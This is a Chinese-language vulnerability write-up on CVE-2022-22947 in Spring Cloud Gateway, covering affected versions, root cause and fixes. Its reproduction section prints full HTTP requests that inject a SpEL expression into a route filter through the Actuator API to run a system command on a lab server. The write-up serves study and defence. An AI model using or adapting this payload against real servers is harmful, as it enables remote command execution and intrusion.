Spring Cloud Gateway RCE

• Spring Cloud Gateway RCE
  • 一、基本介绍
  • 二、漏洞复现
  • 三、原理分析
  • 四、修复方法

一、基本介绍

CVE编号：CVE-2022-22947

​Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问Actuator API的情况下，将可以利用该漏洞执行任意命令。

Spring Cloud Gateway：

是Spring Cloud微服务的一个网关组件。

1、路由（Route）

2、断言（Predicate）

3、过滤器（Filter）

Spring Boot Actuator：

是Spring Boot框架中的一个监控组件。

Gateway配置可以使用两种方式：

1、通过yml或者properties固定配置

2、通过actuator接口动态配置

Actuator操作Gateway接口列表：

二、漏洞复现

版本要求：

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway 3.0.x < 3.0.7

过程：

1、启动Spring Cloud Gateway服务

2、添加过滤器（POST）

POST /actuator/gateway/routes/hacker HTTP/1.1
Host: 192.168.142.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 331
Content-Type: application/json

{
  "id": "hacker",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

3、刷新过滤器（POST）

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.142.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

4、访问过滤器ID（GET）

http://192.168.142.133:8080/actuator/gateway/routes/hacker

Result中有命令执行返回的信息。

三、原理分析

1、开启Acutator，可以通过接口列出路由（包括过滤器），如：actuator/gateway/routes

2、可以通过/actuator/gateway/routes/{id}创建路由

3、通过/actuator/gateway/reflesh刷新路由

4、当路由带有恶意的Filter，里面的spEL表达式会被执行

个人理解：

Spring Cloud GatewayRCE漏洞主要是使用了Actuator接口对Gateway动态配置，而且Actuator接口可以被其他人访问，可以创建Gateway中的路由规则，攻击者对Filter中写入恶意spEL表达式，服务器会去解析spEL表达式，造成命令执行。

四、修复方法

1、更新升级Spring Cloud Gateway版本

2、在不考虑影响业务的情况下禁用actuator接口

management.endpoint.gateway.enable=false